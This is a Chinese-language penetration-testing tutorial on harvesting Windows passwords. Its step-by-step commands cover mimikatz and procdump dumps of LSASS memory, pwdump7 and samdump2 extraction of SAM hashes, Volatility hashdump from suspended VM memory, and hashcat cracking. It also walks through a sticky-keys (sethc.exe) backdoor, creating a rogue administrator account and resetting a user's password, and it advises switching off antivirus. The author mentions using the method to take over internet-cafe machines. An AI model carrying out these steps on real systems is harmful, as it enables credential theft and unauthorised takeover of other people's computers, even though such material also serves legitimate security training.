Windows 密碼抓取方式總結

滲透測試過程中我們經常需要獲取管理員的賬號密碼，以便進行更進一步的操作，下面我將給大家總結幾種 的手法！其中可能也會涉及到 apt 的內容，希望大家喜歡。

[本教程具有一定攻擊性，僅限於教學使用，不得用於其他用途]

0x01. 利用 mimikatz 獲取明文密碼

實驗環境：

windows 10 // （win 10 中有 defender 會殺掉我們的 mimikatz，關掉就好）

mimikatz_trunk //

實驗步驟：

1、首先用管理員賬號運行 cmd.exe，這樣才能讓 mimikatz 正常運行

2、緊接著再進入 mimikatz，運行命令

privilege::debug

sekurlsa::logonpasswords

3、此時我們就能得到 username，password 的密文，給大家推薦個網站：

https://www.somd5.com

這裡可以很容易的解密大多數密文

0x02. 利用 procdump & mimikatz 獲取密碼

實驗環境：

windows 7

procdump //

mimikatz_trunk

實驗步驟:

1、首先用 procdump 下載 LSASS 進程的內存，因為 procdump 是 Microsoft Sysinternals tools 中的工具，所以 AV 是不會查殺它的（記住用管理員運行 cmd ）

C:Users imes0ngDesktopProcdumpprocdump.exe -accepteula -ma lsass.exe C:Users imes0ngDesktoplsass.dmp

2、接著用 mimikatz 打開 dmp 文件，獲取內存中的內容 // （ lsass.dmp 可以下載到我們本地主機再查看裡面的內容，相當於離線模式 ）

C:Users imes0ngDesktopmimikatz_trunkx64mimikatz.exe

sekurlsa::minidump C:Users ime0sngDesktoplsass.dmp

sekurlsa::tspkg

0x03. 利用 pwdump7 獲取密碼

實驗環境：

windows 7

pwdump7 //

實驗步驟：

1、直接用管理員運行 cmd，再運行 pwdump7.exe

2、用 hashcat 直接跑 NTLM 密碼

hashcat -m 1000 AFC44EE7351D61D00698796DA06B1EBF /usr/share/wordlists/sqlmap.txt --force

0x04. 利用虛擬機文件獲取密碼

關於如何用工具直接獲取密碼就介紹到這裡，其實還不止以上這些工具可以幫助我們達到目的，例如：:

https://github.com/giMini/PowerMemory

https://github.com/quarkslab/quarkspwdump

等都是不錯的工具，不過我覺得以上介紹的已經足夠大家使用，貪多嚼不爛，下面我將介紹其它不同於上述的方法獲取 hash 密碼！

接下來我們將獲取 Windows 7 虛擬機中的賬號密碼，首先需要將虛擬機掛起，這樣才能產生 和 文件！這兩個文件主要是用來獲取內存數據的，如果用其它工具能夠獲取內存數據的話完全可以不用這兩個文件，例如：:

https://www.fireeye.com/services/freeware/memoryze.html

http://qpdownload.com/dumpit/

實驗環境：

windows 7 掛起狀態

Vmss2core //

Volatility //

實驗步驟：

1、運行 Vmss2core 解析虛擬機文件，生成 memory.dmp 文件

./vmss2core-mac64 -W /Users/apple1/Documents/Virtual Machines.localized/Windows 7 x64.vmwarevm/Windows 7 x64-89925192.vmss /Users/apple1/Documents/Virtual Machines.localized/Windows 7 x64.vmwarevm/Windows 7 x64-89925192.vmem

2、利用大神級取證工具 volatility 獲取 SYSTEM 和 SAM 的虛擬地址， 架構一定要指定正確，不然會找不到地址

./volatility_2.6_mac64_standalone/volatility_2.6_mac64_standalone hivelist -f memory.dmp --profile=Win7SP1x64

3、接下來要做的就是獲取對應地址的數據了，記住 sys-offset 和 sam-offset 指定的都是虛擬地址，別亂指什麼物理地址，可以看到我這裡有兩個用戶賬號，它們的 NTML hash 都被我拿到了，隨便找點工具解密就行了，上面也講過 hashcat 解密！

./volatility_2.6_mac64_standalone/volatility_2.6_mac64_standalone hashdump -f memory.dmp --profile=Win7SP1x64 sys-offset=0xfffff8a000024010 sam-offset=0xfffff8a000b33010

0x05. 利用 kali ISO 獲取密碼

這是筆者最喜歡使用的方法，也是最早掌握的方法，說個題外話：當初我還利用這個方法在網吧免費上網，甚至因為網吧的區域網 win7 環境我還拿到幾台肉雞 shell，不過就是玩玩沒幹壞事。

在開始之前我們應該先準備一個 USB 啟動盤，製作方法可以看我以前的文章：

https://times0ng.github.io/2018/03/01/kali安裝KVM入坑筆記/

不過我現在只是為了演示一下效果就直接使用 VM 虛擬機插入 ISO 文件模擬 USB 啟動盤。

實驗環境：

windows 10

kali ISO // download here

實驗步驟：

1、首先將 kali ISO 鏡像文件映射到 win10 虛擬機中（如果你是用 USB 啟動盤插入物理機的話需要先進入 BIOS 引導界面，然後修改啟動順序，將 USB 放到硬碟之前 ）

2、然後啟動 win10 就會進入 kali 的引導界面，我們點擊 Live (amd 64) 即可

3、進入kali之後，先查看 win10 在哪個硬碟（一般就是 size 最大的那個盤），然後將其掛載到 /mnt 目錄下，之後對 /mnt 目錄下的操作就相當於對 win10 進行操作了

fdisk -l && mount /dev/sda2 /mnt && cd /mnt/

4、掛載完之後我們先盜取賬號密碼【 Win10 果然更安全了，居然顯示是空密碼，這顯然不是我們要的結果，第二張圖附上 Win7 的效果圖】

cd /mnt/Windows/System32/config/ && samdump2 SYSTEM SAM

hashcat -m 1000 afc44ee7351d61d00698796da06b1ebf /usr/share/wordlists/sqlmap.txt--force

5、雖然 win10 密碼安全性加強了，但並不阻礙我們進行別的操作，下面我們使用經典的 shift 提權技術來完成進一步操作，上一篇 Windows 提權基礎：

https://times0ng.github.io/2018/04/13/Windows-提權基礎（下）/

講漏了，這裡補上

cd /mnt/Windows/System32/

cp cmd.exe sethc.exe

6、OK 現在需要做的就是關閉 kali ，將映射到 win10 的 ISO 移除，然後啟動 win10，可以看到登錄界面，此時我們連續快速的多次按 shift 鍵就能彈出命令行

7、我們的許可權這麼大，想必添加個管理員賬號什麼的也不成問題，下面我添加個 test 管理員賬號，然後登錄，一進去就碰到 win10 給我各種 Hi，看得我一臉懵逼

net user test test /add

net localgroup administrators /add test

logoff

8、剛才我們沒能抓到 win10 的 hash，但是如果我們仍然想登錄 times0ng 賬號的話可以先用命令行修改密碼，然後再登陸。【很尷尬，自己的 ID 都敲錯了】

net user time0sng toor

0x06. 結語

信安之路新業務

為了提升作者團隊的優勢，我們推出了原創視頻付費觀看服務，只有作者團隊的成員可以錄製視頻，分享在知識星球，供大家通過一元查看主題的方式為作者團隊付出勞動的作者提供一點金錢上的獎勵，這個收入是直接付費給主題發布者也就是原創作者的帳號上面，所以多多支持作者的辛苦勞動，讓作者們給大家帶來更多更好的精彩內容，也歡迎大家努力加入我們的作者團隊，在一起交流學習提升技術的基礎上增加一些額外的收入。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！